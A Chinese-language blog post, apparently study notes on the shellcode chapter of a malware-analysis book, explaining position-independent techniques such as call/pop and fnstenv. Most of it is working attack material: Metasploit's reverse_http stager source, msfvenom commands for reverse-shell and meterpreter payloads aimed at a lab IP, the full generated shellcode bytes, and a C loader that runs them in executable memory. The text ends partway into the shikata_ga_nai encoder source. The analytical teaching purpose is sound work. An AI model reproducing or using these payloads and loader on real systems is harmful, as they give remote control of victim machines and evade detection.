恶意代码分析实战第十九章 shellcode

作者: doinb1517 | 来源:发表于2022-09-18 01:16 被阅读0次

恶意代码分析实战第十九章 shellcode
C++写一个简单的反弹Shell程序
[Linux_x86栈溢出攻击] 如何优化shellcode(读
恶意代码分析实战第零章恶意代码分析实战实验文件下载
逆向入门分析实战（三）
vmware 恶意代码分析虚拟机网络环境配置 Apate、Ine
pwnable.tw wp
恶意代码分析实战第九章 OllyDbg
恶意代码分析实战第十一章恶意代码的行为
第0章恶意代码分析入门

shellcode是指一个原始可执行代码的有效载荷。shellcode这个名字来源于攻击者通常会使用这段代码来获得被攻陷系统上交互式shell的访问权限。然而，时过境迁，现在这个术语通常被用于描述一段自包含的可执行代码。

加载shellcode进行分析

1、shellcode_launcher.exe https://github.com/clinicallyinane/shellcode_launcher
2、IDA pro 使用IDA Pro可以手动分析shellcode
3、使用scdbg运行shellcode https://github.com/dzzie/SCDBG

如何获取shellcode

shell-storm

link：https://shell-storm.org/shellcode/

storm.png

exploit-db

link：https://www.exploit-db.com/

这里面的shellcode就会少很多

exploit.png

cobaltstrike

使用CS生成shellcode和msf类似原理

msfvenom

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.204.128 LPORT=4466 -a x86 -f c

msfvenom.png

pwntools

link:https://docs.pwntools.com/en/stable/shellcraft.html

pwntool.png

位置无关代码

位置无关代码(PIC:position-independent code）又称地址无关可执行文件 (英文: position-independent executable，缩写为PIE)，是指不使用硬编码地址来寻址指令或数据的代码。PIC广泛使用于共享库，使得同一个库中的代码能够被加载到不同进程的地址空间中。PIC还用于缺少内存管理单元的计算机系统中，使得操作系统能够在单一的地址空间中将不同的运行程序隔离开来。shellcode就是位置无关代码。它不能假设自己在执行时会被加载到一个特定的内存位置，因为在运行时，一个脆弱程序的不同版本可能加载shellcode到不同内存位置。shellcode必须确定所有对代码和数据的内存访问都使用PIC技术。

bb.png

识别执行位置

Shellcode在以位置无关的方式访问数据时，需要解引用一个基址指针。用这个基址指针加上或减去偏移值，将使它安全访问shellcode中包含的数据。因为x86指令集不提供相对EIP的数据访问寻址，而仅对控制流指令提供EIP相对寻址，所以，一个通用寄存器必须首先载入当前指令指针值，作为基址指针来使用。

获取当前指令指针值可能并不那么简单便捷，因为在x86系统上的指令指针不能被软件直接访问。事实上，没法汇编这条mov eax, eip指令，直接向一个通用寄存器中载入当前指令指针。然而，shellcode使用两种普遍的技术解决这个问题:call/pop指令和fnstenv指令。

使用call/pop指令

当一个call指令被执行时，处理器将call后面的指令的地址压到栈上，然后转到被请求的位置进行执行。这个函数执行完后，会执行一个ret指令，将返回地址弹出到栈的顶部，并将它载入指令指针寄存器中。这样做的结果是执行刚好返回到call后面的指令。

当一个call指令被执行时，处理器将call后面的指令的地址压到栈上，然后转到被请求的位置进行执行。这个函数执行完后，会执行一个ret指令，将返回地址弹出到栈的顶部，并将它载入指令指针寄存器中。这样做的结果是执行刚好返回到call后面的指令。
shellcode可以通过在一个call指令后面立刻执行pop指令滥用这种通常约定，这会将紧跟call后面的地址载入指定寄存器中。

call.png

实际使用：

Link：matesploit中reverse_http

https://github.com/rapid7/metasploit-framework/blob/ec4c45f14531b4e935ab92b731db68b7c9d76f7c/lib/msf/core/payload/windows/reverse_http.rb

# -*- coding: binary -*-

module Msf

###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
#
###

module Payload::Windows::ReverseHttp

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
  include Msf::Payload::Windows::BlockApi
  include Msf::Payload::Windows::Exitfunk
  include Msf::Payload::UUID::Options

  #
  # Register reverse_http specific options
  #
  def initialize(*args)
    super
    register_advanced_options(
      [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] +
      Msf::Opt::stager_retry_options +
      Msf::Opt::http_header_options +
      Msf::Opt::http_proxy_options
    )
  end

  #
  # Generate the first stage
  #
  def generate(opts={})
    ds = opts[:datastore] || datastore
    conf = {
      ssl:         opts[:ssl] || false,
      host:        ds['LHOST'] || '127.127.127.127',
      port:        ds['LPORT'],
      retry_count: ds['StagerRetryCount'],
      retry_wait:  ds['StagerRetryWait']
    }

    # Add extra options if we have enough space
    if self.available_space.nil? || (cached_size && required_space <= self.available_space)
      conf[:url]            = luri + generate_uri(opts)
      conf[:exitfunk]       = ds['EXITFUNC']
      conf[:ua]             = ds['HttpUserAgent']
      conf[:proxy_host]     = ds['HttpProxyHost']
      conf[:proxy_port]     = ds['HttpProxyPort']
      conf[:proxy_user]     = ds['HttpProxyUser']
      conf[:proxy_pass]     = ds['HttpProxyPass']
      conf[:proxy_type]     = ds['HttpProxyType']
      conf[:custom_headers] = get_custom_headers(ds)
    else
      # Otherwise default to small URIs
      conf[:url]        = luri + generate_small_uri
    end

    generate_reverse_http(conf)
  end

  #
  # Generate the custom headers string
  #
  def get_custom_headers(ds)
    headers = ""
    headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader']
    headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie']
    headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer']

    if headers.length > 0
      headers
    else
      nil
    end
  end

  #
  # Generate and compile the stager
  #
  def generate_reverse_http(opts={})
    combined_asm = %Q^
      cld                    ; Clear the direction flag.
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
      start:
        pop ebp
      #{asm_reverse_http(opts)}
    ^
    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
  end

  #
  # Generate the transport-specific configuration
  #
  def transport_config(opts={})
    transport_config_reverse_http(opts)
  end

  #
  # Generate the URI for the initial stager
  #
  def generate_uri(opts={})
    ds = opts[:datastore] || datastore
    uri_req_len = ds['StagerURILength'].to_i

    # Choose a random URI length between 30 and 255 bytes
    if uri_req_len == 0
      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
    end

    if uri_req_len < 5
      raise ArgumentError, "Minimum StagerURILength is 5"
    end

    generate_uri_uuid_mode(:init_native, uri_req_len)
  end

  #
  # Generate the URI for the initial stager
  #
  def generate_small_uri
    generate_uri_uuid_mode(:init_native, 30)
  end

  #
  # Determine the maximum amount of space required for the features requested
  #
  def required_space
    # Start with our cached default generated size
    space = cached_size

    # Add 100 bytes for the encoder to have some room
    space += 100

    # Make room for the maximum possible URL length
    space += 256

    # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
    space += 31

    # Proxy options?
    space += 200

    # Custom headers? Ugh, impossible to tell
    space += 512

    # The final estimated size
    space
  end

  #
  # Convert a string into a NULL-terminated ASCII byte array
  #
  def asm_generate_ascii_array(str)
    (str.to_s + "\x00").
      unpack("C*").
      map{ |c| "0x%.2x" % c }.
      join(",")
  end

  #
  # Generate an assembly stub with the configured feature set and options.
  #
  # @option opts [Bool] :ssl Whether or not to enable SSL
  # @option opts [String] :url The URI to request during staging
  # @option opts [String] :host The host to connect to
  # @option opts [Integer] :port The port to connect to
  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
  # @option opts [String] :proxy_host The optional proxy server host to use
  # @option opts [Integer] :proxy_port The optional proxy server port to use
  # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS
  # @option opts [String] :proxy_user The optional proxy server username
  # @option opts [String] :proxy_pass The optional proxy server password
  # @option opts [String] :custom_headers The optional collection of custom headers for the payload.
  # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up
  # @option opts [Integer] :retry_wait The seconds to wait before retry a new request
  #
  def asm_reverse_http(opts={})

    retry_count   = opts[:retry_count].to_i
    retry_wait   = opts[:retry_wait].to_i * 1000
    proxy_enabled = !!(opts[:proxy_host].to_s.strip.length > 0)
    proxy_info    = ""

    if proxy_enabled
      if opts[:proxy_type].to_s.downcase == "socks"
        proxy_info << "socks="
      else
        proxy_info << "http://"
      end

      proxy_info << opts[:proxy_host].to_s
      if opts[:proxy_port].to_i > 0
        proxy_info << ":#{opts[:proxy_port]}"
      end
    end

    proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user]
    proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass]

    custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers])

    http_open_flags = 0
    secure_flags = 0

    if opts[:ssl]
      http_open_flags = (
        0x80000000 | # INTERNET_FLAG_RELOAD
        0x04000000 | # INTERNET_NO_CACHE_WRITE
        0x00400000 | # INTERNET_FLAG_KEEP_CONNECTION
        0x00200000 | # INTERNET_FLAG_NO_AUTO_REDIRECT
        0x00080000 | # INTERNET_FLAG_NO_COOKIES
        0x00000200 | # INTERNET_FLAG_NO_UI
        0x00800000 | # INTERNET_FLAG_SECURE
        0x00002000 | # INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
        0x00001000 ) # INTERNET_FLAG_IGNORE_CERT_CN_INVALID

      secure_flags = (
        0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
        0x00001000 | # SECURITY_FLAG_IGNORE_CERT_CN_INVALID
        0x00000200 | # SECURITY_FLAG_IGNORE_WRONG_USAGE
        0x00000100 | # SECURITY_FLAG_IGNORE_UNKNOWN_CA
        0x00000080 ) # SECURITY_FLAG_IGNORE_REVOCATION
    else
      http_open_flags = (
        0x80000000 | # INTERNET_FLAG_RELOAD
        0x04000000 | # INTERNET_NO_CACHE_WRITE
        0x00400000 | # INTERNET_FLAG_KEEP_CONNECTION
        0x00200000 | # INTERNET_FLAG_NO_AUTO_REDIRECT
        0x00080000 | # INTERNET_FLAG_NO_COOKIES
        0x00000200 ) # INTERNET_FLAG_NO_UI
    end

    asm = %Q^
      ;-----------------------------------------------------------------------------;
      ; Compatible: Confirmed Windows 8.1, Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
      ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
      ;-----------------------------------------------------------------------------;

      ; Input: EBP must be the address of 'api_call'.
      ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
      load_wininet:
        push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
        push 0x696e6977        ; ...
        push esp               ; Push a pointer to the "wininet" string on the stack.
        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
        call ebp               ; LoadLibraryA( "wininet" )
        xor ebx, ebx           ; Set ebx to NULL to use in future arguments
    ^

    asm << %Q^
    internetopen:
      push ebx               ; DWORD dwFlags
    ^
    if proxy_enabled
      asm << %Q^
        push esp               ; LPCTSTR lpszProxyBypass ("" = empty string)
      call get_proxy_server
        db "#{proxy_info}", 0x00
      get_proxy_server:
                               ; LPCTSTR lpszProxyName (via call)
        push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
      ^
    else
      asm << %Q^
        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
        push ebx               ; LPCTSTR lpszProxyName (NULL)
        push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
      ^
    end
    if opts[:ua].nil?
      asm << %Q^
        push ebx               ; LPCTSTR lpszAgent (NULL)
      ^
    else
      asm << %Q^
        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
      call get_useragent
        db "#{opts[:ua]}", 0x00
                               ; LPCTSTR lpszAgent (via call)
      get_useragent:
      ^
    end
    asm << %Q^
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
      call ebp
    ^

    asm << %Q^
      internetconnect:
        push ebx               ; DWORD_PTR dwContext (NULL)
        push ebx               ; dwFlags
        push 3                 ; DWORD dwService (INTERNET_SERVICE_HTTP)
        push ebx               ; password (NULL)
        push ebx               ; username (NULL)
        push #{opts[:port]}    ; PORT
        call got_server_uri    ; double call to get pointer for both server_uri and
      server_uri:              ; server_host; server_uri is saved in EDI for later
        db "#{opts[:url]}", 0x00
      got_server_host:
        push eax               ; HINTERNET hInternet (still in eax from InternetOpenA)
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
        call ebp
        mov esi, eax           ; Store hConnection in esi
    ^

    # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it
    # doesn't set the Proxy-Authorization header on the CONNECT request.

    if proxy_enabled && proxy_user
      asm << %Q^
        ; DWORD dwBufferLength (length of username)
        push #{proxy_user.length}
        call set_proxy_username
      proxy_username:
        db "#{proxy_user}",0x00
      set_proxy_username:
                             ; LPVOID lpBuffer (username from previous call)
        push 43              ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
        push esi             ; hConnection
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
        call ebp
      ^
    end

    if proxy_enabled && proxy_pass
      asm << %Q^
        ; DWORD dwBufferLength (length of password)
        push #{proxy_pass.length}
        call set_proxy_password
      proxy_password:
        db "#{proxy_pass}",0x00
      set_proxy_password:
                             ; LPVOID lpBuffer (password from previous call)
        push 44              ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
        push esi             ; hConnection
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
        call ebp
      ^
    end

    asm << %Q^
      httpopenrequest:
        push ebx               ; dwContext (NULL)
        push #{"0x%.8x" % http_open_flags}   ; dwFlags
        push ebx               ; accept types
        push ebx               ; referrer
        push ebx               ; version
        push edi               ; server URI
        push ebx               ; method
        push esi               ; hConnection
        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
        call ebp
        xchg esi, eax          ; save hHttpRequest in esi
     ^
    if retry_count > 0
      asm << %Q^
      ; Store our retry counter in the edi register
      set_retry:
        push #{retry_count}
        pop edi
      ^
    end

    asm << %Q^
      send_request:
    ^

    if opts[:ssl]
      asm << %Q^
      ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
      set_security_options:
        push 0x#{secure_flags.to_s(16)}
       mov eax, esp
        push 4                 ; sizeof(dwFlags)
        push eax               ; &dwFlags
        push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
        push esi               ; hHttpRequest
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
        call ebp
      ^
    end

    asm << %Q^
      httpsendrequest:
        push ebx               ; lpOptional length (0)
        push ebx               ; lpOptional (NULL)
    ^

    if custom_headers
      asm << %Q^
        push -1                ; dwHeadersLength (assume NULL terminated)
        call get_req_headers   ; lpszHeaders (pointer to the custom headers)
        db #{custom_headers}
      get_req_headers:
      ^
    else
      asm << %Q^
        push ebx               ; HeadersLength (0)
        push ebx               ; Headers (NULL)
      ^
    end

    asm << %Q^
        push esi               ; hHttpRequest
        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
        call ebp
        test eax,eax
        jnz allocate_memory

     set_wait:
        push #{retry_wait}     ; dwMilliseconds
        push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
        call ebp               ; Sleep( dwMilliseconds );
      ^

    if retry_count > 0
      asm << %Q^
        try_it_again:
          dec edi
          jnz send_request

        ; if we didn't allocate before running out of retries, bail out
        ^
    else
      asm << %Q^
        try_it_again:
          jmp send_request

        ; retry forever
        ^
    end

    if opts[:exitfunk]
      asm << %Q^
    failure:
      call exitfunk
      ^
    else
      asm << %Q^
    failure:
      push 0x56A2B5F0        ; hardcoded to exitprocess for size
      call ebp
      ^
    end

    if defined?(read_stage_size?) && read_stage_size?
      asm << %Q^
    allocate_memory:
    read_stage_size:
      push ebx               ; temporary storage for stage size
      mov eax, esp           ; pointer to 4b buffer for stage size
      push ebx               ; temporary storage for bytesRead
      mov edi, esp           ; pointer to 4b buffer for bytesRead
      push edi               ; &bytesRead
      push 4                 ; bytes to read
      push eax               ; &stage size
      push esi               ; hRequest
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
      call ebp               ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
      pop ebx                ; bytesRead (unused, pop for cleaning)
      pop ebx                ; stage size
      test eax,eax           ; download failed? (optional?)
      jz failure
      xor eax, eax
      push 0x40              ; PAGE_EXECUTE_READWRITE
      push 0x1000            ; MEM_COMMIT
      push ebx               ; Stage allocation
      push eax               ; NULL as we dont care where the allocation is
      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    download_prep:
      xchg eax, ebx          ; place the allocated base address in ebx
      push ebx               ; store a copy of the stage base address on the stack (for ret later)
      push ebx               ; temporary storage for bytes read count
      mov edi, esp           ; &bytesRead
    download_more:
      push edi               ; &bytesRead
      push eax               ; read length
      push ebx               ; buffer
      push esi               ; hRequest
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
      call ebp
      test eax,eax           ; download failed? (optional?)
      jz failure
      pop eax                ; clear the temporary storage for bytesread
    ^
    else
      asm << %Q^
    allocate_memory:
      push 0x40              ; PAGE_EXECUTE_READWRITE
      push 0x1000            ; MEM_COMMIT
      push 0x00400000        ; Stage allocation (4Mb ought to do us)
      push ebx               ; NULL as we dont care where the allocation is
      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

    download_prep:
      xchg eax, ebx          ; place the allocated base address in ebx
      push ebx               ; store a copy of the stage base address on the stack
      push ebx               ; temporary storage for bytes read count
      mov edi, esp           ; &bytesRead

    download_more:
      push edi               ; &bytesRead
      push 8192              ; read length
      push ebx               ; buffer
      push esi               ; hRequest
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
      call ebp

      test eax,eax           ; download failed? (optional?)
      jz failure

      mov eax, [edi]
      add ebx, eax           ; buffer += bytes_received

      test eax,eax           ; optional?
      jnz download_more      ; continue until it returns 0
      pop eax                ; clear the temporary storage
      ^
      end
    asm << %Q^
    execute_stage:
      ret                    ; dive into the stored stage address

    got_server_uri:
      pop edi                //edi指向url
      call got_server_host

    server_host:
      db "#{opts[:host]}", 0x00
    ^

    if opts[:exitfunk]
      asm << asm_exitfunk(opts)
    end

    asm
  end

  #
  # Do not transmit the stage over the connection.  We handle this via HTTPS
  #
  def stage_over_connection?
    false
  end

  #
  # Always wait at least 20 seconds for this payload (due to staging delays)
  #
  def wfs_delay
    20
  end

end

end

可以使用msfvenom生成reverse_http 的shellcode，并使用Visual Stadio进行调试

# 生成shellcode
┌──(root💀kali)-[/home/kali]
└─# msfvenom -p windows/meterpreter/reverse_http lhost=192.168.204.128 lport=8888 --platform win -f c                     
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 589 bytes
Final size of c file: 2500 bytes
unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b\x72\x28"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x52\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61"
"\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20"
"\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x32\x2e\x32\x3b\x20"
"\x72\x76\x3a\x39\x37\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f"
"\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f"
"\x78\x2f\x39\x37\x2e\x30\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53"
"\x53\x6a\x03\x53\x53\x68\xb8\x22\x00\x00\xe8\x10\x01\x00\x00"
"\x2f\x51\x48\x62\x54\x52\x74\x42\x35\x38\x49\x5a\x4a\x36\x30"
"\x6a\x71\x4b\x73\x74\x52\x30\x67\x5a\x48\x57\x59\x5a\x74\x39"
"\x64\x35\x6b\x76\x79\x47\x58\x41\x61\x4f\x53\x77\x43\x42\x79"
"\x33\x65\x5f\x7a\x75\x37\x31\x58\x2d\x4d\x2d\x58\x76\x77\x70"
"\x53\x77\x43\x53\x5f\x77\x35\x35\x43\x4b\x73\x6f\x52\x70\x49"
"\x59\x47\x31\x6b\x33\x6f\x4f\x6d\x7a\x67\x74\x51\x32\x6f\x33"
"\x75\x6d\x63\x58\x36\x5f\x67\x7a\x7a\x66\x4a\x79\x5f\x5a\x7a"
"\x7a\x68\x31\x76\x65\x56\x4f\x6a\x79\x52\x36\x55\x65\x54\x48"
"\x42\x73\x6a\x44\x69\x76\x7a\x4d\x4f\x50\x67\x4d\x32\x54\x78"
"\x79\x48\x33\x46\x4a\x30\x66\x6c\x30\x50\x39\x74\x30\x00\x50"
"\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x68\x84"
"\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a"
"\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85"
"\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5"
"\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00"
"\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89"
"\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5"
"\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38"
"\x2e\x32\x30\x34\x2e\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";


# 在VS中加载shellcode
#include "test.h"
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker,"/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")

unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b\x72\x28"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x52\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61"
"\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20"
"\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x32\x2e\x32\x3b\x20"
"\x72\x76\x3a\x39\x37\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f"
"\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f"
"\x78\x2f\x39\x37\x2e\x30\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53"
"\x53\x6a\x03\x53\x53\x68\xb8\x22\x00\x00\xe8\x10\x01\x00\x00"
"\x2f\x51\x48\x62\x54\x52\x74\x42\x35\x38\x49\x5a\x4a\x36\x30"
"\x6a\x71\x4b\x73\x74\x52\x30\x67\x5a\x48\x57\x59\x5a\x74\x39"
"\x64\x35\x6b\x76\x79\x47\x58\x41\x61\x4f\x53\x77\x43\x42\x79"
"\x33\x65\x5f\x7a\x75\x37\x31\x58\x2d\x4d\x2d\x58\x76\x77\x70"
"\x53\x77\x43\x53\x5f\x77\x35\x35\x43\x4b\x73\x6f\x52\x70\x49"
"\x59\x47\x31\x6b\x33\x6f\x4f\x6d\x7a\x67\x74\x51\x32\x6f\x33"
"\x75\x6d\x63\x58\x36\x5f\x67\x7a\x7a\x66\x4a\x79\x5f\x5a\x7a"
"\x7a\x68\x31\x76\x65\x56\x4f\x6a\x79\x52\x36\x55\x65\x54\x48"
"\x42\x73\x6a\x44\x69\x76\x7a\x4d\x4f\x50\x67\x4d\x32\x54\x78"
"\x79\x48\x33\x46\x4a\x30\x66\x6c\x30\x50\x39\x74\x30\x00\x50"
"\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x68\x84"
"\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a"
"\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85"
"\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5"
"\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00"
"\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89"
"\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5"
"\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38"
"\x2e\x32\x30\x34\x2e\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";

void main()
{
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void(*)())Memory)();
}

生成二进制可执行文件后在IDA或者X32dbg中调试，跑到pop edi下一条命令时，shellcode已经使用call/pop手法将url指针加载到了edi寄存器

edi.png

ws.png

使用fnstenv指令

x87浮点单元（FPU)在普通x86架构中提供了一个隔离的执行环境。它包含一个单独的专用寄存器集合，当一个进程正在使用FPU执行浮点运算时，这些寄存器需要由操作系统在上下文切换时保存。下图是被fstenv指令与fnstenv指令使用的28字节结构体，这个结构体在32位保护模式中执行时被用来保存FPU状态到内存中。

fpu.png

这里唯一影响使用的域是在字节偏移量12处的fpu_instruction_pointer。它将保留被FPU使用的最后一条CPU指令的地址，并为异常处理器标识哪条FPU指令可能导致错误上下文信息。需要这个域是因为FPU是与CPU并行运行的。如果FPU产生了一个异常，异常处理器不能简单地通过参照中断返回地址来标识导致这个错误的指令。

fsp1.png

fsp2.png

1处的fldz指令将浮点数0.0压到FPU栈上。fpu_instruction_pointer的值在FPU中被更新成指向fldz指令。执行在处的fnstenv指令，将FpuSaveState结构体保存到栈上的[esp-ech]处，这允许shellcode在处执行一个pop，将fpu_instruction_pointer的值载入EBX中。一旦这个pop执行，EBX会包含一个值，这个值指向这个内存中fldz指令的位置然后shellcode开始使用EBX作为一个基址寄存器访问嵌入到代码中的数据。

msfvenom中的的编码器shikata_ga_nai也利用了此原理

Link；https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/poly'

class MetasploitModule < Msf::Encoder::XorAdditiveFeedback

  # The shikata encoder has an excellent ranking because it is polymorphic.
  # Party time, excellent!
  Rank = ExcellentRanking

  def initialize
    super(
      'Name'             => 'Polymorphic XOR Additive Feedback Encoder',
      'Description'      => %q{
        This encoder implements a polymorphic XOR additive feedback encoder.
        The decoder stub is generated based on dynamic instruction
        substitution and dynamic block ordering.  Registers are also
        selected dynamically.
      },
      'Author'           => 'spoonm',
      'Arch'             => ARCH_X86,
      'License'          => MSF_LICENSE,
      'Decoder'          =>
        {
